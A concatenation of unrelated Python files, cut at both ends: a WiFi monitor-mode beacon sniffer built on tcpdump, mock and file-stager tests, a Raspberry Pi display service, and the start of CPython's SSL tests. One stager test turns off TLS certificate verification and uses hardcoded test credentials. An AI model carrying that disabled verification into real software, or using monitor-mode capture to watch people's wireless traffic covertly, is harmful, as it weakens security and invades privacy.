if counter > max_counter : print('\n[Error] Max trial reached'); return 1
print("OK")
return 0
class WiFiDevice:
"""
Base class to listen wireless devices
Parameters:
iface: (string) wireless interface name. Check available interfaces and their names using `iwconfig`
channels: (list of ints) channels to listen (1-11)
chopper_ts: (int/float) sampling time in seconds for channel hopper to go through all channels. If ts:1s and there are 2 channels, each channel gets 0.5s
filter: (string) filters for tcpdump. default: Beacon, listens only to beacon frames.
ts: (int/float) sampling time in seconds for sample functions
Functions:
chopper_start:
starts channel hopping if desired
tcpdump_start:
starts wifi data aquisition
read_start:
starts tcpdump_start,
extracts main information and stores it in data array
sample:
starts read_start
clears data every specified sampling time
*_alive:
* is chopper/tcpdump/read/sample
checks if process has started
terminate:
ends all processes
"""
def __init__(self,**kwargs):
self.iface = kwargs.get('iface','wlp5s0')
self.channels = kwargs.get('channels', (1,6,11))
self.chopper_ts = kwargs.get('channel_hopper_sampling_time',1.0)
self.filter = kwargs.get('filter','Beacon')
self.ts = kwargs.get('sampling_time',self.chopper_ts)
self.data = kwargs.get('data',None)
# variables
if self.data is None: self.data = multiprocessing.Manager().list()
# filters
if self.filter == 'Beacon': self.filter = ' type mgt subtype beacon'
# processes
self.chopper_process = None
self.tcpdump_process = None
self.read_process = None
self.sample_process = None
if self.init_device() == 0: print('\nDevice Initialized')
else: print('[Error] Device initialization failed')
def init_device(self):
# turn the interface on/off to reset
if execute_retry("sudo -S ifconfig {:s} down".format(self.iface)) != 0 : return 1
if execute_retry("sudo -S ifconfig {:s} up".format(self.iface)) != 0 : return 1
# change interface to monitor mode (off -> monitor mode -> on)
if execute_retry("sudo -S ifconfig {:s} down".format(self.iface)) != 0 : return 1
if execute_retry("sudo -S iwconfig {:s} mode monitor".format(self.iface)) != 0 : return 1
if execute_retry("sudo -S ifconfig {:s} up".format(self.iface)) != 0 : return 1
# set interface to first channel in channels
if execute_retry("sudo -S iwconfig {:s} channel {:d}".format(self.iface,self.channels[0])) != 0 : return 1
return 0
# Channel Hopping
## public functions
def chopper_start(self):
#self.cmd = "rosrun rf_sensor channel_hopper.py -i {} -t {} -ch {}".format(self.iface,1.*self.chopper_ts," ".join(str(ch) for ch in self.channels))
if self.chopper_process is not None: self.chopper_process.terminate()
try:
self.chopper_process = multiprocessing.Process(target=self.__chopper)
self.chopper_process.start()
except:
print('[Error] multiprocessing.Process(chopper_run) failed')
print('Channel Hopper Initialized')
return 0
def chopper_alive(self):
try: return self.chopper_process.is_alive()
except: return False
## private function
def __chopper(self):
ts = 1.0*self.chopper_ts/len(self.channels)
ret = 0
while(not ret):
for ch in self.channels:
ret = os.system("sudo -S iwconfig {:s} channel {:d}".format(self.iface,ch))
if ret != 0 : print('[Error] Channel hopper could not change channel. Are you running as sudo?')
time.sleep(ts)
# tcpdump wrapper
## public functions
def tcpdump_start(self):
"""
iface must be initialized before with init(iface)
"""
cmd = 'sudo -S tcpdump -i {:s} -ne --time-stamp-precision=micro -l --immediate-mode {:s}'.format(self.iface,self.filter)
self.tcpdump_process = subprocess.Popen(cmd.split(),stdout=subprocess.PIPE)
print('tcpdump process initialized')
return 0
def tcpdump_alive(self):
try: return self.tcpdump_process.poll() is None
except: return False
# WiFi data decoding
## public functions
def read_start(self):
"""
continuously decodes incomming tcpdump messages and publishes to data list
"""
if self.tcpdump_alive() is False: self.tcpdump_start()
self.read_process = multiprocessing.Process(target=self.__decode)
self.read_process.start()
print('RSS messages stored at data')
return 0
def read(self):
"""
outputs last message only
"""
if self.tcpdump_alive() is False : self.tcpdump_start()
print(self.tcpdump_process.stdout.readline())
def read_alive(self):
try: return self.read_process.is_alive() is True
except: return False
## private function
def __decode(self,verbose=False):
"""
decodes tcpdump message to data list
"""
while True:
rss_data = list()
s = 0
try:
tmp = self.tcpdump_process.stdout.readline()
tmp = tmp.split()
for i in range(len(tmp)):
if b'MHz' in tmp[i]: freq = int(tmp[i-1]); s+=10
if b'dBm' in tmp[i]: rss_data.append(int(tmp[i].split(b'dBm')[0])); s+=1
if b'BSSID' in tmp[i]: mac = tmp[i].split(b'BSSID:')[1]; s+=10
if verbose: print(s)
if s>=21:
self.data.append(list([datetime.datetime.utcnow(), freq, mac, np.asarray(rss_data)]))
if verbose: print(self.data[-1])
else: print('Incomplete rss msg')
except:
print('[Error] Could not decode rss data')
time.sleep(1/500.) #refresh at 500Hz
# samples at a fixed sampling time (ts)
## public functions
def sample(self):
if self.read_alive() is False : self.read_start()
try:
self.sample_process = multiprocessing.Process(target=self.__sample)
self.sample_process.start()
except:
print('[Error] multiprocessing.Process(sample_process) failed')
print('Sampling every {:f} s'.format(self.ts))
return 0
def sample_alive(self):
try: return self.sample_process.is_alive()
except: return False
## private function
def __sample(self):
while True:
time.sleep(self.ts)
self.data[:] = []
def terminate(self):
print('Terminating Processes')
if self.sample_alive() is True: print('Terminating sample'); self.sample_process.terminate()
if self.read_alive() is True: print('Terminating read'); self.read_process.terminate()
if self.chopper_alive() is True: print('Terminating chopper'); self.chopper_process.terminate()
if self.tcpdump_alive() is True:
print('Terminating tcpdump')
cmd = "sudo kill -9 {:d}".format(self.tcpdump_process.pid)
os.system(cmd)
if self.tcpdump_alive() is True:
print("Could not kill the process, please try")
print(" ",cmd)
|
test_mock.py | from localite.flow.mock import append, Queue, mocked_settings
from localite.flow.mock import create_response as cr
import threading
import time
from subprocess import Popen, PIPE
import pytest
from os import environ
def test_message_queue():
outqueue = Queue(maxsize=7)
is_running = threading.Event()
appender = threading.Thread(target=append, args=(outqueue, is_running, 0.1))
appender.start()
is_running.set()
time.sleep(2)
is_running.clear()
assert outqueue.unfinished_tasks == 7
def test_cli():
p = Popen(["localite-mock"], env=environ, stderr=PIPE, stdout=PIPE)
time.sleep(1)
Popen(["localite-mock", "--kill"])
time.sleep(1)
o, e = p.communicate()
assert b"Shutting MOCK down" in o
def test_create_response():
assert cr(None) == None
assert "error" in cr({"current_instrument": "GARBAGE"}).keys()
assert "NONE" in cr({"current_instrument": "NONE"}).values()
assert 1 in cr({"coil_0_target_index": 1}).values()
assert "reason" in cr({"coil_0_target_index": -1}).keys()
assert "reason" in cr({"coil_0_target_index": "T"}).keys()
assert "coil_0_didt" in cr({"single_pulse": "COIL_0"}).keys()
assert "error" in cr({"single_pulse": "COIL_2"}).keys()
assert 1 in cr({"coil_0_amplitude": 1}).values()
assert "error" in cr({"coil_0_amplitude": -1}).keys()
rsp = {"mepmaxtime": 18, "mepamplitude": 50, "mepmin": -25, "mepmax": 25}
assert rsp in cr({"coil_0_response": rsp}).values()
bad = {"mepmaxtime": -99999, "mepamplitude": 50, "mepmin": -25, "mepmax": 25}
assert "error" in cr({"coil_0_response": bad}).keys()
bad = {"mepmaxtime": 18, "mepamplitude": -99999, "mepmin": -25, "mepmax": 25}
assert "error" in cr({"coil_0_response": bad}).keys()
assert "error" in cr({"bad": "bad"}).keys()
assert "error" in cr({"get": "bad"}).keys()
prms = [(k, v) for k, v in mocked_settings.items()]
@pytest.mark.parametrize("k, v", prms)
def test_get_response(k, v):
assert cr({"get": k})[k] == v
|
RPI_SAKS_service.py | #!/usr/bin/env python
# coding=utf-8
#
import RPi.GPIO as GPIO
import time
import threading
import os, sys
import string
# 使用BCM编码
GPIO.setmode(GPIO.BCM)
LED_D1 = 5
LED_D2 = 6
LED_D3 = 13
LED_D4 = 19
LED_D5 = 0
LED_D6 = 1
LED_D7 = 7
LED_D8 = 8
BUZZER_B1 = 11
KEY_K1 = 23
KEY_K2 = 18
KEY_K3 = 24
KEY_K4 = 25
LED_A = 21
LED_B = 16
LED_C = 19
LED_D = 6
LED_E = 5
LED_F = 20
LED_G = 26
LED_DP = 13
LED_COM1 = 17
LED_COM2 = 27
LED_COM3 = 22
LED_COM4 = 10
IR_LED = 12
IR_RECEIVER = 9
DS18B20 = 4
UART_TXD = 14
UART_RXD = 15
IC2_SDA = 2
IC2_SLC = 3
# 预设变量
LED_OFF = -1 # 数码管关闭
NUM = [{0:LED_OFF, 1:LED_OFF, 2:LED_OFF, 3:1, 'p0':False, 'p1':False, 'p2':False, 'p3':False},
{0:LED_OFF, 1:LED_OFF, 2:LED_OFF, 3:2, 'p0':False, 'p1':False, 'p2':False, 'p3':False},
{0:LED_OFF, 1:LED_OFF, 2:LED_OFF, 3:3, 'p0':False, 'p1':False, 'p2':False, 'p3':False},
{0:LED_OFF, 1:LED_OFF, 2:LED_OFF, 3:4, 'p0':False, 'p1':False, 'p2':False, 'p3':False}]
def init():
# 电源按钮
GPIO.setup(KEY_K1, GPIO.IN, pull_up_down = GPIO.PUD_UP)
GPIO.setup(LED_D7, GPIO.OUT, initial = GPIO.HIGH)
GPIO.setup(LED_D8, GPIO.OUT, initial = GPIO.HIGH)
# 数码管显示模式选择开关
GPIO.setup(KEY_K3, GPIO.IN, pull_up_down = GPIO.PUD_UP)
GPIO.setup(KEY_K4, GPIO.IN, pull_up_down = GPIO.PUD_UP)
# 数码管位选
GPIO.setup(LED_COM1, GPIO.OUT, initial = GPIO.HIGH)
GPIO.setup(LED_COM2, GPIO.OUT, initial = GPIO.HIGH)
GPIO.setup(LED_COM3, GPIO.OUT, initial = GPIO.HIGH)
GPIO.setup(LED_COM4, GPIO.OUT, initial = GPIO.HIGH)
# 数码管段选
GPIO.setup(LED_A, GPIO.OUT, initial = GPIO.HIGH)
GPIO.setup(LED_B, GPIO.OUT, initial = GPIO.HIGH)
GPIO.setup(LED_C, GPIO.OUT, initial = GPIO.HIGH)
GPIO.setup(LED_D, GPIO.OUT, initial = GPIO.HIGH)
GPIO.setup(LED_E, GPIO.OUT, initial = GPIO.HIGH)
GPIO.setup(LED_F, GPIO.OUT, initial = GPIO.HIGH)
GPIO.setup(LED_G, GPIO.OUT, initial = GPIO.HIGH)
GPIO.setup(LED_DP, GPIO.OUT, initial = GPIO.HIGH)
def deinit():
GPIO.cleanup()
# 电源按钮点击事件
def powerButtonClick(channel):
global powerButtonClickTimes, powerCountDown
powerButtonClickTimes += 1
# 等待确认
if powerButtonClickTimes == 1:
print "If you really want to reboot or shut down please continue click!"
powerCountDown = 3
# 重启模式
if powerButtonClickTimes == 2:
GPIO.output(LED_D7, GPIO.LOW)
GPIO.output(LED_D8, GPIO.HIGH)
print "System will restart in 10s!"
powerCountDown = 10
# 关机模式
if powerButtonClickTimes == 3:
GPIO.output(LED_D7, GPIO.HIGH)
GPIO.output(LED_D8, GPIO.LOW)
print "System will halt in 10s!"
powerCountDown = 10
# 模式取消
if powerButtonClickTimes == 4:
GPIO.output(LED_D7, GPIO.HIGH)
GPIO.output(LED_D8, GPIO.HIGH)
print "Cancel"
powerButtonClickTimes = 0
powerCountDown = 10
# 电源按钮响应服务
def powerButton():
global powerButtonClickTimes, powerCountDown
powerButtonClickTimes = 0
powerCountDown = 10
while True:
# 等待确认
if powerButtonClickTimes == 1 and powerCountDown == 0:
print "Cancel"
powerButtonClickTimes = 0
# 重启模式if
if powerButtonClickTimes == 2 and powerCountDown == 0:
print "Reboot"
os.system("reboot")
sys.exit()
# 关机模式
if powerButtonClickTimes == 3 and powerCountDown == 0:
print "Halt"
os.system("halt")
sys.exit()
if powerButtonClickTimes == 1 or powerButtonClickTimes == 2 or powerButtonClickTimes == 3:
print powerCountDown
powerCountDown -= 1
time.sleep(1)
else:
time.sleep(0.2)
# 数码管段选函数
def setWE(n, p):
GPIO.output(LED_A, GPIO.HIGH)
GPIO.output(LED_B, GPIO.HIGH)
GPIO.output(LED_C, GPIO.HIGH)
GPIO.output(LED_D, GPIO.HIGH)
GPIO.output(LED_E, GPIO.HIGH)
GPIO.output(LED_F, GPIO.HIGH)
GPIO.output(LED_G, GPIO.HIGH)
GPIO.output(LED_DP, GPIO.HIGH)
if p:
GPIO.output(LED_DP, GPIO.LOW)
if n == 0:
GPIO.output(LED_A, GPIO.LOW)
GPIO.output(LED_B, GPIO.LOW)
GPIO.output(LED_C, GPIO.LOW)
GPIO.output(LED_D, GPIO.LOW)
GPIO.output(LED_E, GPIO.LOW)
GPIO.output(LED_F, GPIO.LOW)
if n == 1:
GPIO.output(LED_B, GPIO.LOW)
GPIO.output(LED_C, GPIO.LOW)
if n == 2:
GPIO.output(LED_A, GPIO.LOW)
GPIO.output(LED_B, GPIO.LOW)
GPIO.output(LED_D, GPIO.LOW)
GPIO.output(LED_E, GPIO.LOW)
GPIO.output(LED_G, GPIO.LOW)
if n == 3:
GPIO.output(LED_A, GPIO.LOW)
GPIO.output(LED_B, GPIO.LOW)
GPIO.output(LED_C, GPIO.LOW)
GPIO.output(LED_D, GPIO.LOW)
GPIO.output(LED_G, GPIO.LOW)
if n == 4:
GPIO.output(LED_B, GPIO.LOW)
GPIO.output(LED_C, GPIO.LOW)
GPIO.output(LED_F, GPIO.LOW)
GPIO.output(LED_G, GPIO.LOW)
if n == 5:
GPIO.output(LED_A, GPIO.LOW)
GPIO.output(LED_C, GPIO.LOW)
GPIO.output(LED_D, GPIO.LOW)
GPIO.output(LED_F, GPIO.LOW)
GPIO.output(LED_G, GPIO.LOW)
if n == 6:
GPIO.output(LED_A, GPIO.LOW)
GPIO.output(LED_C, GPIO.LOW)
GPIO.output(LED_D, GPIO.LOW)
GPIO.output(LED_E, GPIO.LOW)
GPIO.output(LED_F, GPIO.LOW)
GPIO.output(LED_G, GPIO.LOW)
if n == 7:
GPIO.output(LED_A, GPIO.LOW)
GPIO.output(LED_B, GPIO.LOW)
GPIO.output(LED_C, GPIO.LOW)
if n == 8:
GPIO.output(LED_A, GPIO.LOW)
GPIO.output(LED_B, GPIO.LOW)
GPIO.output(LED_C, GPIO.LOW)
GPIO.output(LED_D, GPIO.LOW)
GPIO.output(LED_E, GPIO.LOW)
GPIO.output(LED_F, GPIO.LOW)
GPIO.output(LED_G, GPIO.LOW)
if n == 9:
GPIO.output(LED_A, GPIO.LOW)
GPIO.output(LED_B, GPIO.LOW)
GPIO.output(LED_C, GPIO.LOW)
GPIO.output(LED_D, GPIO.LOW)
GPIO.output(LED_F, GPIO.LOW)
GPIO.output(LED_G, GPIO.LOW)
# 数码管位选函数
def setP0(n):
GPIO.output(LED_COM1, GPIO.HIGH)
GPIO.output(LED_COM2, GPIO.HIGH)
GPIO.output(LED_COM3, GPIO.HIGH)
GPIO.output(LED_COM4, GPIO.HIGH)
if n == 0:
GPIO.output(LED_COM1, GPIO.LOW)
if n == 1:
GPIO.output(LED_COM2, GPIO.LOW)
if n == 2:
GPIO.output(LED_COM3, GPIO.LOW)
if n == 3:
GPIO.output(LED_COM4, GPIO.LOW)
# 数码管显示服务
def show():
i = 0
while True:
if GPIO.input(KEY_K3):
if GPIO.input(KEY_K4):
mode = 0
else:
mode = 1
else:
if GPIO.input(KEY_K4):
mode = 2
else:
mode = 3
if i == 0:
setP0(i)
setWE(NUM[mode][0], NUM[mode]['p0'])
if i == 1:
setP0(i)
setWE(NUM[mode][1], NUM[mode]['p1'])
if i == 2:
setP0(i)
setWE(NUM[mode][2], NUM[mode]['p2'])
if i == 3:
setP0(i)
setWE(NUM[mode][3], NUM[mode]['p3'])
i = -1
time.sleep(0.004)
i = i + 1
# 时间获取函数
def getTime():
lastSec = 0
while True:
localtime = time.localtime(time.time())
NUM[0][1] = localtime.tm_hour % 10
NUM[0][0] = (localtime.tm_hour - NUM[0][1]) / 10
NUM[0][3] = localtime.tm_min % 10
NUM[0][2] = (localtime.tm_min - NUM[0][3]) /10
if lastSec == localtime.tm_sec:
time.sleep(0.02)
else:
NUM[0]['p1'] = True
lastSec = localtime.tm_sec
time.sleep(0.35)
NUM[0]['p1'] = False
# CPU温度获取函数
def getCPUTemp():
while True:
ts = os.popen('vcgencmd measure_temp').readline()
t = string.atof(ts.replace("temp=","").replace("'C\n",""))
t = t * 10
NUM[1][3] = t % 10
t = (t - NUM[1][3]) / 10
NUM[1][2] = t % 10
t = (t - NUM[1][2]) / 10
NUM[1][1] = t % 10
NUM[1]['p2'] = True
time.sleep(0.5)
def main():
# 添加电源按钮服务线程
powerButtonThread = threading.Thread(target = powerButton)
powerButtonThread.setDaemon(True)
powerButtonThread.start()
GPIO.add_event_detect(KEY_K1, GPIO.RISING, callback = powerButtonClick, bouncetime = 200) # 注册电源按钮监听事件
# 添加时间刷新服务线程
getTimeThread = threading.Thread(target = getTime)
getTimeThread.setDaemon(True)
getTimeThread.start()
# 添加CPU温度刷新服务线程
getCPUTempThread = threading.Thread(target = getCPUTemp)
getCPUTempThread.setDaemon(True)
getCPUTempThread.start()
# 添加数码管显示服务线程
showThread = threading.Thread(target = show)
showThread.setDaemon(True)
showThread.start()
print "You can press Ctrl+c or input \"exit\" to close this service!"
try:
while True:
usrCmd = raw_input(">")
if usrCmd == "exit":
return
except KeyboardInterrupt:
print "User press Ctrl+c, exit!"
if __name__ == "__main__":
init()
main()
deinit()
|
test_filestager.py | #!/usr/bin/env python
import sys
if sys.version_info[:2] < (2,6):
sys.exit(0)
from icecube import dataio
from icecube.dataio.I3FileStagerFile import I3FileStagerFile
from icecube import icetray
import os
# icetray.logging.I3Logger.global_logger = icetray.I3NullLogger()
icetray.logging.set_level('TRACE')
dataio.set_local_scratch_dir('.')
def test_scratchdir(url=os.path.expandvars("file://$I3_BUILD/env-shell.sh")):
stager = I3FileStagerFile()
# directory is created lazily
scratch_dir = stager.scratch_dir
assert(scratch_dir is None)
# now it should exist
stager.GetReadablePath(url)
scratch_dir = stager.scratch_dir
assert(os.path.isdir(scratch_dir))
del stager
# now it should be gone
assert(not os.path.isdir(scratch_dir))
def _test_stage(url, minsize=100):
import ssl
if 'https' in url:
# TODO: Make the actual cacert work.
# It just seems to hang when using this line.
#stager = I3FileStagerFile(ssl={'cafile':'cacert.pem','capath':os.getcwd()})
try:
# accept self-signed certs
stager = I3FileStagerFile(ssl={'context':ssl._create_unverified_context()})
except AttributeError:
stager = I3FileStagerFile()
else:
stager = I3FileStagerFile()
local_fname = stager.GetReadablePath(url)
assert(os.path.exists(str(local_fname)))
assert(os.stat(str(local_fname)).st_size > minsize)
local_fname = str(local_fname)
# check that staged files are really deleted
if stager.CanStageIn(url):
assert(not os.path.exists(str(local_fname)))
def _make_http(port=None,usessl=False,basic_auth=False):
try:
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
except ImportError:
from http.server import BaseHTTPRequestHandler,HTTPServer
import random
import ssl
import threading
import subprocess
data = b''.join([b'test' for _ in range(1000)])
if basic_auth:
class Handle(BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type','text')
self.end_headers()
def do_AUTHHEAD(self):
self.send_response(401)
self.send_header('WWW-Authenticate', 'Basic realm=\"Test\"')
self.send_header('Content-type','text')
self.end_headers()
def do_GET(self):
if self.headers['Authorization'] == None:
self.do_AUTHHEAD()
self.wfile.write('no auth header received')
elif self.headers['Authorization'] == 'Basic dGVzdDp0ZXN0':
self.do_HEAD()
self.wfile.write(bytearray(self.headers['Authorization'],'ascii'))
self.wfile.write(data)
else:
self.do_AUTHHEAD()
self.wfile.write(self.headers['Authorization'])
self.wfile.write('not authenticated')
else:
class Handle(BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_response(200)
self.send_header('Content-type','text')
self.end_headers()
def do_GET(self):
self.do_HEAD()
self.wfile.write(data)
if not port:
while True:
try:
port = random.randint(10000,50000)
httpd = HTTPServer(('localhost', port), Handle)
except socket.error:
continue
break
else:
httpd = HTTPServer(('localhost', port), Handle)
if usessl:
print('ssl')
p = subprocess.Popen(['openssl','req','-new','-x509',
'-keyout','privkey.pem',
'-out','cacert.pem','-days','1',
'-batch','-passout','pass:passkey',
'-subj', '/'],
stdin=subprocess.PIPE)
p.communicate(input=b'passkey')
if p.returncode:
raise Exception('cannot generate self-signed cert')
try:
if subprocess.call(['openssl','rsa','-in','privkey.pem','-out','key.pem','-passin','pass:passkey']):
raise Exception('error removing password from key.pem')
open('key.pem','a').write(open('cacert.pem').read())
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='key.pem',
server_side=True)
except Exception:
os.remove('privkey.pem')
os.remove('cacert.pem')
if os.path.exists('key.pem'):
os.remove('key.pem')
raise
t = threading.Thread(target=httpd.serve_forever)
t.start()
def shutdown():
httpd.shutdown()
t.join()
if os.path.exists('privkey.pem'):
os.remove('privkey.pem')
if os.path.exists('key.pem'):
os.remove('key.pem')
if os.path.exists('cacert.pem'):
os.remove('cacert.pem')
return port,shutdown
def test_double_stage():
"""
Stager should download files only once and return a handle to the existing
file if it's still live
"""
port,stop = _make_http()
url = "http://localhost:%d"%port
try:
stager = I3FileStagerFile()
f1 = stager.GetReadablePath(url)
f2 = stager.GetReadablePath(url)
assert(str(f1) == str(f2))
assert(os.path.exists(str(f1)))
assert(os.path.exists(str(f2)))
del f1
assert(os.path.exists(str(f2)))
f2path = str(f2)
del f2
assert(not os.path.exists(f2path))
finally:
stop()
def test_http():
port,stop = _make_http()
address = "http://localhost:%d"%port
try:
_test_stage(address)
finally:
stop()
def test_http_with_auth():
port,stop = _make_http(basic_auth=True)
address = "http://test:test@localhost:%d"%port
try:
_test_stage(address)
finally:
stop()
def test_https():
port,stop = _make_http(usessl=True)
address = "https://localhost:%d"%port
try:
_test_stage(address)
finally:
stop()
def test_https_with_auth():
port,stop = _make_http(usessl=True,basic_auth=True)
address = "https://test:test@localhost:%d"%port
try:
_test_stage(address)
finally:
stop()
def test_file():
_test_stage(os.path.expandvars("file://$I3_BUILD/env-shell.sh"))
def test_file_with_relative_path():
relative = os.path.relpath(os.path.expandvars('$I3_BUILD/env-shell.sh'))
try:
_test_stage('file://'+relative)
raise AssertionError("An error should have been raised")
except RuntimeError:
pass
def test_file_implicit():
_test_stage(os.path.expandvars("$I3_BUILD/env-shell.sh"))
if __name__ == "__main__":
for k, v in list(locals().items()):
if k.startswith("test") and hasattr(v, "__call__"):
v()
|
test_ssl.py | # -*- coding: utf-8 -*-
# Test the support for SSL and sockets
import sys
import unittest
from test import test_support as support
from test.script_helper import assert_python_ok
import asyncore
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import shutil
import urllib2
import traceback
import weakref
import platform
import functools
from contextlib import closing
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = CERTFILE.encode(sys.getfilesystemencoding())
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = ONLYCERT.encode(sys.getfilesystemencoding())
BYTES_ONLYKEY = ONLYKEY.encode(sys.getfilesystemencoding())
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = CAPATH.encode(sys.getfilesystemencoding())
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNING_CA = data_file("pycacert.pem")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
REMOTE_ROOT_CERT = data_file("selfsigned_pythontestdotnet.pem")
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = DHFILE.encode(sys.getfilesystemencoding())
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
class BasicTests(unittest.TestCase):
def test_sslwrap_simple(self):
# A crude test for the legacy API
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET))
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
try:
ssl.sslwrap_simple(socket.socket(socket.AF_INET)._sock)
except IOError, e:
if e.errno == 32: # broken pipe when ssl_sock.do_handshake(), this test doesn't care about that
pass
else:
raise
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Aug 26 14:23:15 2028 GMT'))
self.assertEqual(p['notBefore'], asn1time('Aug 29 14:23:15 2018 GMT'))
self.assertEqual(p['serialNumber'], '98A7CF88C74A32ED')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
